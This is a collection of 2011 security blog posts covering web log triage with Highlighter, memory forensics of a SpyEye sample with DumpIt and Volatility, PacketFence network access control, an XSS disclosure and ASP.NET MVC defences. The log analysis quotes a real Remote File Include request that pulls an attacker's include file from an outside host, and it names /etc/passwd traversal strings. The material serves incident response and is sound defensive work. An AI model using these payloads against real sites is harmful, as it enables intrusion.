For this toolsmith I used web logs from the month of August for HolisticInfoSec.org to demonstrate how to reduce 96427 log lines to useful attack types.
Highlighter is designed for use with text files; .log, .txt, and .csv are all consumed readily.
You can opt to copy all of a log file’s content to your clipboard then click File - Import from Clipboard, or choose File - Open - File and select the log file of your choosing. Highlighter also works well with documents created by Mandiant Intelligent Response (MIR); users of that commercial offering may also find Highlighter useful.
Once the log file is loaded, right-click context menus become your primary functionality drivers for Highlighter use. Keep in mind that, once installed, the Highlighter User Guide PDF is included under Mandiant - Highlighter in the Start menu.
HolisticInfoSec.org logs exhibit all the expected web application attack attempts in living color (Highlighter pun intended); we’ll bring them all to light (rimshot sound effect) here.

Remote File Include (RFI) attacks

I’ve spent a fair bit of time analyzing RFI attacks such that I am aware of common include file names utilized by attackers during attempted insertions on my site.
A common example is fx29id1.txt and a typical log entry follows:
85.25.84.200 - - [14/Aug/2011:20:30:13 -0600] "GET ////////accounts/inc/include.php?language=0&lang_settings[0][1]=http://203.157.161.13//appserv/fx29id1.txt? HTTP/1.1" 404 2476 "-" "Mozilla/5.0"
With holisticinfosec.org-Aug-2011.log loaded, I dropped fx29id1.txt in the keyword search field.
Eight lines were detected; I used the graphical view to scroll and align the text view with highlighted results as seen in Figure 1.

FIGURE 1: Highlighted RFI keyword

Reviewing each of the eight entries confirmed the fact that the RFI attempts were unsuccessful as a 404 code was logged with each entry.
I also took note of the fact that all eight entries originated from 85.25.84.200. I highlighted 85.25.84.200 and right-clicked and selected Show Only. The result limited my view to only entries including 85.25.84.200, 15 entries in total. As Jed indicated above, I quickly discovered not only other malfeasance from 85.25.84.200, but other similar attack patterns from other IPs.
I right-clicked again, selected Field Operations- Set Delimiter then clicked Pre-Defined - ApacheLog. A final right-click thereafter to select Field Operations - Parse Date/Time resulted in the histogram seen in Figure 2.

FIGURE 2: Histogram showing Events Over Time

If you wish to leave fields highlighted while then tagging another for correlation be sure to check the Cumulative checkbox at the top toolbar. Additionally, to jump to a highlighted field, though only for the most recent set of highlights, you can use the 'n' hotkey for next and 'p' hotkey for previous. Hotkeys can be reviewed via File - Edit Hotkeys and are well defined in the user guide. I recommend reading said user guide rather than asking thick headed questions of the project lead as I did for which answers are painfully obvious. ;-)
If you wish to manage highlights, perhaps remove one of a set of cumulative highlights, right-click in the text UI, choose Highlights - Manage, then check the highlight you wish to remove as seen in Figure 3.

FIGURE 3: Highlighter Manager

Directory Traversal

I ran quick, simple checks for cross-site scripting and SQL injection in my logs via the likes of keyword searches such as script, select, union, onmouseover, etc. and ironically found none. Most have been a slow month. But of 96427 log entries for August I did find 10 directory traversal attempts specific to the keyword search /etc/password. I realize this is a limiting query in and of itself (there are endless other target opportunities) but it proves the point.
To ensure that none were successful I cleared all highlights, manually highlighted /etc/passwd from one of the initially discovered entries, then clicked Highlight. I then right-clicked one of the highlighted lines and selected Show Only. The UI reduced the view down to only the expected 10 results. I then selected 404 with a swipe of the mouse, hit Highlight again and confirmed that all 10 entries exhibited 404s only. Phew, no successful attempts.

FIGURE 4: Highlighter query reduction

There are some feature enhancements I’d definitely like to see added such as a wrap lines option built into the text view; I submitted same to forum for review. Please do so as well if you have feature requests or bug reports.
As a final test to validate Jed’s claim as to large file handling as a Highlighter strong suit, I loaded a 2.44GB Swatch log file. It took a little time to load and format (to be expected), but it Highlighter handled 24,502,412 log entries admirably (no choking). I threw a query for a specific inode at it and Highlighter tagged 1930 hits across 25 million+ lines in ten minutes. Nice.

In Conclusion

Highlighter is clearly improving and is definitely a useful tool for optimizing signal to noise in log files on which you’re conducting analysis activity. It should come as no surprise that the folks from Mandiant have produced yet another highly useful yet free tool for community use. Once again, well done.
Ping me via email if you have questions (russ at holisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Jed Mitten, Highlighter project developer

toolsmith: Memory Analysis with DumpIt and Volatility

2011-09-04T20:46:00.000-07:00

Sept. 11, 2001: “To honor those whose lives were lost, their families, and all who sacrifice that we may live in freedom. We will never forget.“

Reprinted with permission for the author only from the September 2011 ISSA Journal

Prerequisites

SIFT 2.1 if you’d like a forensics-focused virtual machine with Volatility ready to go
Python version 2.6 or higher on Window, Linux, or Mac OS X
Some plugins require third party libraries

Introduction

Two recent releases give cause for celebration and discussion in toolsmith. First, in July, Matthieu Suiche of MoonSols released DumpIt for general consumption, a “fusion of win32dd and win64dd in one executable.” Running DumpIt on the target system generates a copy of the physical memory in the current directory. That good news was followed by Ken Pryor’s post on the SANS Computer Forensics Blog (I’m a regular reader, you should be too) mentioning the fact that Volatility 2.0 had been released in time for the Open Memory Forensics Workshop, and that SIFT 2.1 was also available. Coincidence? I think not; Volatility 2.0 is available on SIFT 2.1. Thus, the perfect storm formed creating the ideal opportunity to discuss the complete life-cycle of memory acquisition and analysis for forensics and incident response. In May 2010, we discussed SIFT 2.0 and mentioned how useful Volatility is, but didn’t give its due. Always time to make up for our shortcomings, right?
If you aren't already aware of Volatility, “the Volatility Framework is a completely open collection of tools, implemented in Python under the GPL, for the extraction of digital artifacts from volatile memory (RAM) samples.”
One thing I’ve always loved about writing toolsmith is meeting people (virtually or in person) who share the same passion for and dedication to our discipline. Such is the case with the Volatility community.
As always, I reached out to project leads/contributors and benefited from very personal feedback regarding Volatility. Mike Auty and Michael Hale Ligh (MHL) each offered valuable insight you may not glean from the impressive technical documentation available to Volatility users.
Regarding the Volatility roadmap, Mike Auty indicated that the team has an ambitious goal for their next release (which they want to release in 6 months, a big change from their last release). They're hoping to add Linux support (as written by Andrew Case), as well as 64-bit support for Windows (still being written), and a general tidy up for the code base without breaking the API.
MHL offered the following:
“At the Open Memory Forensics Workshop (OMFW) in late July, many of the developers sat on a panel and described what got them involved in the project. Some of us are experts in disk forensics, wanting to extend those skills to memory analysis. Some are experts in forensics for platforms other than Windows (such as Linux, Android, etc.) who were looking for a common platform to integrate code. I personally was looking for new tools that could help me understand the Windows kernel better and make my training course on rootkits more interesting to people already familiar with running live tools such as GMER, IceSword, Rootkit Unhooker, etc. I think the open source nature of the project is inviting to new-comers, and I often refer to the source code as a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.”
Man, does that say it all! Stay with this thinking and consider this additional nugget of Volatility majesty from MHL. In his blog post specific to using Volatility to detect Stuxnet, Stuxnet's Footprint in Memory with Volatility 2.0, he discusses Sysinternals tools side-by-side with artifacts identified with Volatility. MHL is dead on right when he says this may be of “interest your readers, especially those who have never heard of Volatility before, because it builds on something they do know - Sysinternals tools.”
This was an incredibly timely post for me as I read it right on the heels of hosting the venerable Mark Russinovich at the ISSA Puget Sound July chapter meeting where he presented Zero Day Malware Cleaning with the Sysinternals Tools, including live analysis of the infamous Stuxnet virus.
See how this all comes together so nicely?
Read Mark’s three posts on Technet followed immediately by MHL’s post on his MNIN Security Blog, then explore Volatility for yourself; I’ll offer you some SpyEye analysis examples below.
NOTE: MHL was one of the authors of Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code; I’ll let the reviews speak for themselves (there are ten reviews on Amazon and all are 5 stars). I share Harlan’s take on the book and simply recommend that you buy it if this topic interests you.
Some final thoughts from AAron Walters, the principal developer and lead for Volatility:
“We have a hard working development team and it’s appreciated when people recognize the work that is being done. The goal was to build a modular and extendable framework that would allow researchers and practitioners come together and collaborate. As a result, shortening the amount of time it takes to get cutting edge research into the hands of practitioners. We also wanted to encourage and push the technical advancement of the digital forensics field which had frequently lagged behind the offensive community. It's amazing to see how far the project has come since I dropped the initial public release more than 4 years ago. With the great community now supporting the project, there are lot more exciting enhancements in the pipe line...”

DumpIt

Before you can conduct victim system analysis you need to capture memory. Some form of dd, including MoonSols win32dd and win64dd were/are de facto standards but the recently released MoonSols DumpIt makes the process incredibly simple.
On a victim system (local or via psexec) running DumpIt is as easy as executing DumpIt.exe from the command-line or Windows Explorer. The raw memory dump will be generated and written to the same directory you’re running DumpIt from; answer yes or no when asked if you wish to continue and that’s all there is to it. A .raw memory image named for the hostname, date, and UTC time will result. DumpIt is ideal for your incident response jump kit; deploy the executable on a USB key or your preferred response media.

Figure 1: Run DumpIt

Painless and simple, yes? I ran DumpIt on a Windows XP SP3 virtual machine that had been freshly compromised with SpyEye (md5: 00B77D6087F00620508303ACD3FD846A), an exercise that resulted in my being swiftly shunted by my DSL provider. Their consumer protection program was kind enough to let me know that “malicious traffic was originating from my account." Duh, thanks for that, I didn’t know. ;-)
Clearly, it’s time to VPN that traffic out through a cloud node, but I digress.
SpyEye has been in the news again lately with USA Today Tech describing a probable surge in SpyEye attacks due to increased availability and reduced cost from what used to be as much as $10,000 for all the bells and whistles, down to as little as $95 for the latest version. Sounds like a good time for a little SpyEye analysis, yes?
I copied the DumpIt-spawned .raw image from the pwned VM to my shiny new SIFT 2.1 VM and got to work.

Volatility 2.0

So much excellent documentation exists for Volatility; on the Wiki I suggest you immediately read the FAQ, Basic Usage, Command Reference, and Features By Plugin.
As discussed in May 2010’s toolsmith on SIFT 2.0, you can make use of Volatility via PTK, but given that we’ve discussed that methodology already and the fact that there are constraints imposed by the UI, we’re going to drive Volatility from the command line for this effort. My memory image was named HIOMALVM02-20110811-165458.raw by DumpIt; I shortened it to HIOMALVM02.raw for ease of documentation and word space.

I executed vol.py imageinfo –f HIOMALVM02.raw to confirm just that, image information. This plugin provided PAE (physical address extension) status as well as hex offsets for DTB (Directory Table Base), KDBG (short for _KDDEBUGGER_DATA64), KPCR (Kernel Processor Control Region), time stamps and processor counts.

Figure 2: imageinfo plugin results

Windows XP SP3, check.
Runtime analysis of my SpyEye sample gave me a few queryable entities to throw at Volatility for good measure, but we’ll operate here as if the only information we have only suspicion of system compromise.
It’s always good to see what network connections may have been made.

vol.py --profile=WinXPSP3x86 connscan -f HIOMALVM02.raw

The connscan plugin scans physical memory for connection objects.
Results included:

Interesting, both IPs are in Germany, my VMs don’t make known good connections to Germany so let’s build from here.
The PID associated with the second connection to 188.40.138.148 over port 80 is 1512.
The pslist plugin prints active processes by walking the PsActiveProcessHead linked list.

vol.py --profile=WinXPSP3x86 pslist -P -f HIOMALVM02.raw

Use –P to acquire the physical offset for a process, rather virtual which is default.
Results included a number of PPID (parent process IDs) that matched the 1512 PID from connscan:

I highlighted the process that jumped out at me given the anomalous time stamp, a 0 thread count and no handles.
Let’s check for additional references to cleansweep.
The pstree plugin prints the process list as a tree so you can visualize the parent/child relationships.

vol.py --profile=WinXPSP3x86 pstree -f HIOMALVM02.raw

Results included the PPID of 1512, and the Pid for cleansweep.

Ah, the victim most likely downloaded cleansweep.exe and executed it via Windows Explorer.
But can we extract actual binaries for analysis via the like of Virus Total? Of course.
This is where the malware plugins are very helpful. I already know I’m not going to have much luck exploring PID 3328 as it has no threads or open handles. MHL points out that a process such as cleansweep.exe typically can't remain active with 0 threads as a process is simply a container for threads, and it will terminate when the final thread exits. Cleansweep.exe is still in the process list probably because another component of the malware (likely the one that started cleansweep.exe in the first place) never called CloseHandle to properly "clean up." That said, the PPID of 1512 has clearly spawned PID 3328 so let’s explore the PPID with the malfind plugin, which extracts injected DLLs, injected code, unpacker stubs, and API hook trampolines. The malware (malfind) plugins
don't come packaged with volatility, but are in fact a part of the above mentioned Malware Analyst's Cookbook; the latest version can also be downloaded.

vol.py --profile=WinXPSP3x86 -f HIOMALVM02.raw malfind -p 1512 -D output/ yielded PE32 gold as seen in Figure 3.

Figure 3: malfind plugin results

Malfind dropped each of the suspicious PE files it discovered to my output directory as .dmp files. I submitted each to Virus Total, and bingo, all three were malicious and identified as SpyEye variants as seen in Figure 4.

Figure 4: PE results from Virus Total

In essence, we’ve done for ourselves via memory analysis what online services such as Threat Expert will do via runtime analysis. Compare this discussion to the Threat Expert results for the SpyEye sample I used.
There is so much more I could have discussed here, but space is limited and we’ve pinned the VU meter in the red, so go read the Malware Cookbook as well as all the online Volatility resources, and push Volatility to the boundaries of your skill set and imagination. In my case the only limiting factors were constraints on my time and my lack of knowledge. There are few limits imposed on you by Volatility; 64bit and Linux analysis support are pending. Get to it!

In Conclusion

I’ve said it before and I’ll say it again. I love Volatility. Volatility 2.0 makes me squeal with delight and clap my hands like a little kid at the state fair. Oh the indignity of it all, a grown man cackling and clapping when he finds the resident evil via a quick memory image and the glorious volatile memory analysis framework that is Volatility.
An earlier comment from MHL bears repeating here. Volatility source code can be likened to “a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.” Yeah, what he said.
Do you really need any more motivation to explore and use Volatility for yourself?
There’s a great list of samples to grab and play with. Do so and enjoy! As it has for me, this process will likely become inherent to your IR and forensic efforts, perhaps even surpassing other tactics and methods as your preferred, go-to approach.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Mike Auty & Michael Hale Ligh of the Volatility project.
AAron Walters – Volatility lead

Phorum Phixes Phast

2011-08-29T19:56:00.000-07:00

I was paying a visit to the FreeBSD Diary reading Dan Langille's post grep, sed, and awk for fun and profit (a great read, worthy of your time) when my Spidey sense kicked in.
Specific to log messaging he'd created for captcha failures, Dan mentioned that "these messages are created by some custom code I have added to Phorum."
Oh...Phorum, CMS/BBS/forum/gallery software I'd not seen before.
I installed Phorum 5.2.16 in my test environment, ran it through my normal web application security testing regimen, and found a run-of-the-mill cross-site scripting (XSS) bug. There's no real story there, just another vuln in a realm where they are commonplace.
What is not commonplace in this tale though is the incredibly responsive, timely, and transparent nature with which the Phorum project's Thomas Seifert addressed this vulnerability. I truly appreciate devs and teams like this. He even kindly tolerated my completely misreading the Github commit's additions and deletions.

August 22nd - XSS vuln advisory submitted to security@phorum.org. Yay! They have a security alias, and they read what's submitted to it. :-)

August 25th - Thomas replies and says "Thanks for your report.
We fixed the issue in the git repository, https://github.com/Phorum/Core/commit/c1423ebfff91218a4c1b31047d6baf855603cc91, and will push out a new release in the next 2 days." Sweet, not only is the project responsive and transparent, they're open with their source and change management.

August 26th - Thomas replies again, Phorum 5.2.17 is live. "Release is out:
http://www.phorum.org/phorum5/read.php?64,149490,149490#msg-149490." Outstanding! And a day early than the suggested release window. Advisory published.

One need only read the changelog to see the level of dedication and commitment Thomas and team afford their project.

Nothing else to say but bloody well done. Thank you, Thomas and the Phorum team. More smiles and less middle finger make for happier security grunts.

Cheers.

ASP.NET vs. ASP.NET.MVC & security considerations

2011-08-28T14:30:00.000-07:00

I just read a recent Dr. Dobb's article, as posted in Information Week and online, that provides perspective regarding moving from ASP.NET to ASP.NET.MVC.
Some quick highlights from the article to frame this discussion.
First, ASP.NET.MVC applies the "Model-View-Controller (MVC) to ASP.NET. The MVC pattern, which is frequently used in the design of web sites, aims to separate data, business logic, and the presentation to the user. The challenge in many cases is keeping business logic out of the presentation layer; and careful design based on MVC greatly reduces the prospect of this intermingling."
Second, the various perspectives.

ASP.NET.MVC upside:
"ASP.NET MVC is technically superior to ASP.NET Web Forms because, having been released five years later, it addresses the business and technology changes that have occurred during the intervening period — testability, separation of concerns, ease of modification, and so on."

The ASP.NET.MVC vs ASP.NET middle ground:
"When it comes to the core function, however, there is nearly no difference."

The ASP.NET.MVC downside:
"ASP.NET MVC has greater startup costs. And in some applications, ASP.NET MVC is a substantial turnaround from ASP.NET Web Forms."

I have no take on these positions either way; they all seem reasonable, but the topic triggered dormant thoughts for me bringing back to mind some interesting work from a couple of years ago.

The Dr. Dobb's M-Dev article, while clearly operating from the perspective of development and deployment, does not discuss some of the innate security features available to ASP.NET.MVC users that I think help give it an edge.

Preventing Security Development Errors: Lessons Learned at Windows Live by Using ASP.NET MVC is a November 2009 paper that I've already discussed and is well worthy of another read in this context.
I'll use this opportunity to simply remind readers of ASP.NET.MVC's security-centric features, including available tutorials.

1) Preventing Open Redirection Attacks
Open redirection (CWE-601) is easily prevented with ASP.NET.MVC 3 (code can be added with some modification to ASP.NET MVC 1.0 and 2 applications).
In short, the ASP.NET MVC 3 LogOn action code has been changed to validate the returnUrl parameter by calling a new method in the System.Web.Mvc.Url helper class named IsLocalUrl(). This ASP.NET.MVC tutorial is drawn from Jon Galloway's blog.

2) Prevent CSRF
From the Windows Live paper:
"To defend a Web site against XSRF attacks, ASP.NET MVC provides AntiForgeryToken helpers. These consist of a ValidateAntiForgeryToken attribute, which the developer can attach to controller classes or methods, and the Html.AntiForgeryToken() method."

3) JSON hijacking
Casaba contributed to the Windows Live paper. From their blog:
"For JSON hijacking, they ensure that the JSON result included a canary check by default. This prevented developers from being able to return JSON without a canary, thus preventing JSON hijacking."
Much like the CSRF mitigation, the canary check comes through again.
The Windows Live method defined a custom ASP.NET MVC Action Filter attribute to define the HTTP verbs they would accept and ensure that each action required the use of a canary.

It's also a straightforward process to prevent JavaScript injection & cross-site scripting (XSS) in the ASP.NET.MVC View or Controller via HTML.Encode where you:
a) HTML encode any data entered by website users when you redisplay the data in a view
b) HTML encode the data just before you submit the data to the database
See Stephen Walther's tutorial for more.

In summary, in addition to ASP.NET.MVC's development and functionality features, perhaps these security-centric features may help you decide to make the move to ASP.NET.MVC.

Cheers.

toolsmith: PacketFence - Open Source NAC

2011-08-03T12:54:00.000-07:00

Reprinted with permission for the author only from the August 2011 ISSA Journal

Introduction

An old boss of mine always found a way to blame the vast majority of security-related problems on “the fuzzy neural network behind the keyboard.” Yep, users; what would our lives be without them? There are a plethora of ways, methods, and manner with which to protect your critical assets and networks from said users, amongst them Network Access Control or NAC. A variety of commercial NAC solutions are offered; you may also have heard or read discussions regarding the nuance between Cisco’s Network Admission Control and Microsoft’s Network Access Protection. As such solutions are proprietary and have costs associated with them, we’ll steer clear of any debate and discuss an outstanding free and open source (FOSS) solution, as is the toolsmith norm.

PacketFence is a fully supported (tiered support, bronze to platinum, is available, as well as consultation hours or full deployment services) NAC system that is in use in financial, education, engineering, and manufacturing sectors, to mention a few. It’s used right here in my own backyard at Seattle Pacific University and is considered a trusted and indispensable resource. PacketFence sports a robust feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1x support, Layer-2 isolation of problematic devices, as well as integration with both Snort IDS and Nessus.
PacketFence is supported and maintained by Inverse, a Montreal-based firm. PacketFence development is helmed by Olivier Bilodeau, Inverse’s System Architect.
Olivier provided with an update on PacketFence news and developments as I prepared for this article.
As his is an open source company generating its revenue via services, the PacketFence roadmap is strongly influenced by customer demand and as such sometimes moves in different direction than the public roadmap.

Expect the following in the next major release, 3.0 (likely mid-August):

Completely re-designed Captive Portal
Guest API that, with little effort, allows a lot of different guest management workflows (email confirmation, self-registration, pre-registration, SMS confirmation, hotel-style code generation, etc.)

According to Olivier, the Guest API has been in the making for more than a year in a separate
branch and now they think it's ready to be merged in for the pending 3.0 release.
Inverse has also been working on other features that may or may not make it to 3.0 including:

Ability to run PacketFence in out-of-band and inline mode at the same time
Pushing ACLs/Roles per device/user on the edge. This would allow for more granular control over who has access to what, without VLAN management overhead, and enforced at the edge instead of at the firewall. They are also experimenting with applying QoS the same way.
Integration with RADIUS Accounting to track bandwidth consumption per user and potentially enforce bandwidth usage restrictions

Olivier wants to reinforce that all the development is conducted in the open, released under the GPL, and committed directly to public repositories so all the features mentioned above are available (although at varying degrees of completion). Snapshots are built nightly directly from the trunk branch and several tests are run on it to make sure it meets a certain quality. This makes it very easy to preview upcoming PacketFence features in a staging environment or a VM.
Inverse maintains PacketFence installations where there are more than a thousand switches and even more access points, including several customers who crossed the '25,000 devices handled by PacketFence' line in the last two years or so. As such, Olivier strongly affirms that PacketFence competes with big brand commercial offerings both in cost, features, and scalability.
In addition to keeping an eye on PacketFence.org, you’re encouraged to subscribe to the PacketFence Twitter feed to stay abreast updates on what they’re are working on: @packetfence
Finally, if you’re going to be in Las Vegas for Defcon 19, be sure to check out Olivier’s presentation, PacketFence, The Open Source NAC: What We've Done in the Last Two Years.

Installation/Configuration

First, PacketFence is supported by rich documentation; I’ll only cover some details that were directly applicable to my experience setting it up in the toolsmith lab.
Core to a sound PacketFence installation is a supported switch. Refer to the PacketFence version 2.2.1 Network Devices Configuration Guide for device specifics. I used a Cisco Catalyst 3548 XL for this effort but said switch is rather dated. The Catalyst 3548 XL does not support 802.1X, the preferred port-based Network Access Control method, so I was limited to MAC detection/isolation and was not able to push PacketFence nearly to the extent I would have liked to.
Inverse includes a VMWare appliance, aptly named ZEN (Zero Effort NAC), perfect for folks wishing to assess a fully installed and preconfigured version of PacketFence 2.2.1 when on a tight timeline. Again, there is a PacketFence ZEN version 2.2.1 Installation Guide to support your efforts in full.
Note: the ZEN VMWare appliance version of PacketFence requires a 64-bit capable system.
For those of planning dedicated installations, the recommended distributions are RHEL 5 or CentOS 5 for which Inverse offers a yum repository.
If you intend to investigate PacketFence via the ZEN appliance, you’ll need to configure your supported switch as follows:

VLAN 1 - management VLAN
VLAN 2 - registration VLAN (unregistered devices will be put in this VLAN)
VLAN 3 - isolation VLAN (isolated devices will be put in this VLAN)
VLAN 4 - MAC detection VLAN (empty VLAN: no DHCP, no routing, no nothing)
VLAN 5 - guest VLAN
VLAN 10 - “regular” VLAN

Refer to the IP and subnet table on page 7 of the ZEN Installation Guide for network configurations per VLAN; DHCP and DNS services are provided by PacketFence ZEN.
I set the switch up with an IP address of 10.0.10.2 and on interface f0/48 I defined the port as a dot1q trunk (several VLANs on the port) with VLAN 1 as the native (untagged) VLAN as required for the PacketFence (PacketFence) ZEN host.

This is easily done on a Cisco switch as follows:
enable
conf term
int fa0/48
switchport trunk encapsulation dot1q
switchport mode trunk
end (Cntrl Z)

The ZEN VM appliance is preconfigured to match interfaces to VLANs, just be sure they’re all set to bridged under VM --> Settings --> Network Adapter.

If all is configured properly, and your Zen VM appliance is connected to the do1q trunk interface, you should be able to browse to https://192.168.1.10:1443 and make use of the PacketFence UI.
Note: You’ll discover a slight mismatch between the PacketFence ZEN guide and the network configuration guide where the network configuration guide describes the PacketFence host IP as 192.168.1.5. If you’re going with the ZEN installation guidance and using the ZEN VM, the PacketFence VM appliance IP is 192.168.1.10.

The PacketFence work flow exemplifies a network “perfect world” in my opinion. A host that joins the network does so in a (limited capacity (no Internet or access) via MAC detection (VLAN4) and is then shunted to registration (VLAN2). Upon successful registration a host continues either as a guest (VLAN5) or an approved system for normal access (VLAN10).
Figure 1 offers a node view including all the unregistered hosts identified by my test instance of PacketFence.

Figure 1 - PacketFence Nodes

PacketFence includes a database of known fingerprints and user-agents for ready system identification, and will flag unknowns as seen in Status --> Reports. PacketFence ironically flagged my Barnes & Noble Nook as seen in Figure 2, most likely because I blew the proprietary B & N OS away and loaded it with CyanogenMod 7.1.0 RC1 (Android 2.3.4), which rocks, by the way.

Figure 2 - PacketFence flags hacked Nook fingerprint as unknown

Out of the gate, PacketFence also detected my normal DHCP service and flagged mine as rogue, tagging it as in violation as seen right in the PacketFence Status view depicted in Figure 3.
Legitimate DHCP servers can be added to the pf.conf file preventing alarms for these servers.
DHCP is also run in Registration and Isolation VLANs but it’s recommended that users to manage their own DHCP servers for the Normal VLANs.

Figure 3 - PacketFence Status

As a security wonk my favorite PacketFence features are, of course, security-related:

Detection of abnormal network activity (Snort) where PacketFence defines alerting and suppression coupled with administratively configurable actions
Proactive vulnerability scans (Nessus) conducted during registration, as scheduled, or on an adhoc basis
Isolation for hosts in violation and remediation through a captive portal including logic that distributed the appropriate counsel for violators including banned devices (“You have been detected using a device that has been explicitly disallowed by your network administrator.”) and malware (“Your system has been found to be infected with malware. Due to the threat this infection poses for other systems on the network, network connectivity has been disabled until corrective action is taken.”)

Unregistered and/or unmitigated hosts remain in splendid isolation, life is good.
Once a host is registered it can be added to a category; I arbitrarily defined Trusted Hosts via Nodes --> Categories.
PacketFence offers extensive reporting with output to CSV and the UI, enhance by extensive filtering.
Figure 4 shows by registered host with details.

Figure 4 - Registered Host Report

As you build out and experiment, be sure to take a close look at Configuration settings. You can define/modify interfaces, networks, switches, and fine tune the language included in messages distributed to violators trapped in the captive portal.

In Conclusion

PacketFence is an outstanding offering and my only regret is not being able to commit more time to testing or push its feature set. It left me feeling nostalgic for the days when I was a network systems administrator configuring devices and network security on a regular basis.
Don’t limit your thinking specific to PacketFence; while it’s a great solution for small/medium business, it really can handle the enterprise as well.
Remember the documentation is extensive. Make use of it to get fully wrapped around ALL of PacketFence’s capabilities, then test and deploy.
PacketFence is definitely one of my candidates for Tool of the Year.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Olivier Bilodeau, Inverse System Architect, PacketFence project lead

APWG Survey and deja vu all over again

2011-07-22T10:13:00.000-07:00

As a participant in the APWG IPC, and a contributing researcher, I was pleased to see Dave Piscitello's APWG Web Vulnerabilities Survey Results and Analysis get some press coverage as it went live in mid-June.
Rather than focus on the survey results (you can read those for yourself), I'd like to focus briefly on mitigation and concerns.
The Results and Analysis-compiled responses "suggest that web sites would benefit from broader implementation of preventative measures to mitigate known vulnerabilities and also from monitoring for anomalous behavior or suspicious traffic patterns that may indicate previously unseen or zero day attacks."
Given the broad scope of CMS platforms, forums, galleries, wikis, shopping carts, and others riding on top of the popular LAMP stack, the absence of such preventative measures and monitoring make for hacker nirvana.
Consider the problems shared servers introduce where vulnerabilities in any of the above-mentioned applications preloaded for on demand end-user deployment via cPanel (not to mention cPanel vulnerabilities) can lead to "game over."
Clearly there are challenges: resources, level of commitment to security by site operators, and hosting provider scrutiny to mention a few.
The problem is not new.
When pending Black Hat presentations are describing tools sets such as Diggity "that speed the process of finding security vulnerabilities via Google or Bing", or Embedded Web Servers Exposing Organizations To Attack, you know it's Groundhog Day. Great tool set (Diggity), but that we're still unfortunately talking about the ease with which hacker groups are finding "opportunities" is troubling to say the least.
When #3 on Kelly Jackson Higgins' list of suggestions to repel attackers states "eliminate SQL injection, XSS, other common website flaws" it's deja vu all over again.
The APWG Web Vulnerabilities Survey asked "What actions did you take to stop the attack?" Compiled answers resulted in data such as:
We patched or updated vulnerable software packages 21%
We had our developers fix our custom software 8%
While other results lean heavily towards security misconfiguration issues, there are still clear opportunities to improve SDL/SDLC practices.
As the survey report indicates, "This article barely scratches the surface of the intelligence the APWG IPC has accumulated from the Web Vulnerability Survey. A complete analysis of the survey results—with specific recommendations, remedies, and practices."
I'm in the midst of research focusing on the scanning and misconfiguration elements of Internet Background Radiation (IBR) using a variety of Web logs. This research still points back to the above mentioned problem space and suggestions, but will drive deeper into attacker and victim trends and traits. This work, coupled with earlier web application security research will feed the analysis paper pending publication by the APWG IPC.
My hope is to also present the IBR work at an upcoming security conference along with a paper or article.
Stay tuned.

Mark Russinovich presenting at ISSA Puget Sound

2011-07-18T17:00:00.001-07:00

A quick note to any Seattle-area readers.
ISSA Puget Sound is proud to have Mark Russinovich as this month's speaker, presenting Zero Day Malware Cleaning with the Sysinternals Tools, Thursday, July 21st, 6:00 - 8:30 pm, Building E, 5600 148th Ave NE, Redmond, WA 98052 (Microsoft RedWest campus - max capacity (145))
This is an RSVP only event, please visit the ISSA Puget Sound website for all the details.
Mark will be offering both his recent books, Zero Day: A Novel and Windows Sysinternals Administrator's Reference for sale and will be signing them as well.
If you're in the area, please RSVP and attend this outstanding event and opportunity.

toolsmith: RIPS - PHP static code analyzer

2011-07-04T16:57:00.000-07:00

In July's toolsmith I admit to the fact that I’ve often focused on run-time web application security assessment tools and paid absolutely no attention to static analysis tools.
For those of you in a similar boat, RIPS is a static source code analyzer for vulnerabilities in PHP. RIPS is written by Johannes Dahse who uses it when he audits PHP code, often during Capture The Flag contests.
To test RIPS in all it's glory, I compared its functionality to known finding from a vulnerability disclosure and advisory I posted for Linpha 1.3.4 in March 2009. Linpha 1.3.4 is a photo/image gallery (no longer supported or maintained) which exhibited cross-site request forgery (CSRF) and cross-site scripting (XSS) vulnerabilities during runtime analysis.
Specifically, input passed via GET to the imgid parameter is not properly sanitized by the image_resized_view.php script before being returned to the user. This vulnerability can be exploited to execute arbitrary HTML and JavaScript code in a user’s browser session in the context of an affected site.
To compare this finding to source code analysis with RIPS, I loaded
/var/www/linpha/actions/image_resized_view.php in the RIPS UI and clicked scan.
The results were immediate and clearly identified in source code the same vulnerability I’d discovered at run-time, as seen in Figure 1.

Figure 1

Note that RIPS tags the imgid parameter as vulnerable right out of the gate.
RIPS is becoming more and more feature-rich with each new release; while it's a work in progress, it’s already quite effective and Johannes is actively developing it. You'll enjoy code viewing and exploit creation functionality but one of my favorite new features is graphical representations of scanned files and includes with representation of “how files are connected to each other, what files accept sources (userinput) and what files have sensitive sinks or vulnerabilities” as seen in Figure 2.

Figure 2

Check out the RIPS article here, and download RIPS and Johannes' white paper here.

Cheers.

You can't patch stupid...

2011-06-30T21:29:00.000-07:00

The only thing this incredibly witty site is lacking is a McAfee Secure or Scanless PCI badge. ;-)

http://ismycreditcardstolen.com

Watching mailing lists debate if it's legit or not? Priceless...

In other breaking news, “There’s no device known to mankind that will prevent people from being idiots,” said Mark Rasch, director of network security and privacy consulting for Falls Church, Virginia-based Computer Sciences Corp. (CSC).
Woot! To the fuzzy, neural networks behind the keyboards, step back.

What would life be without users?

Cheers.

APT: anti-hype, reality checks, and resources

2011-06-03T22:47:00.001-07:00

This post is my 200th for HolisticInfoSec, and I mark it with particular consideration for the topic, coupled with profound recognition of the process that lead to this discussion.
As a graduate student enrolled in the SANS Technology Institute's MSISE program, I recently completed the Joint Written Project requirement.
My partners and I were assigned the topic Assessing Outbound Traffic to Uncover Advanced Persistent Threat.
Of my partners, I hold the highest regard; participating in this project with Beth Binde and MAJ TJ O'Connor was quite simply one of the most rewarding efforts of my professional career. The seamless, efficient, tactful, and cooperative engagement practiced throughout the entire 30-day period allowed for completion of the assignment resulted in what we hope readers will consider a truly useful resource in the battle against APT.

Amongst positions taken for this paper is a simple premise: there are tactics that can be applied in the enterprise to detect and defend against APT that do not require expensive, over-hyped, buzzword-laden vendor solutions.
Think I'm kidding about buzzwords and hype?
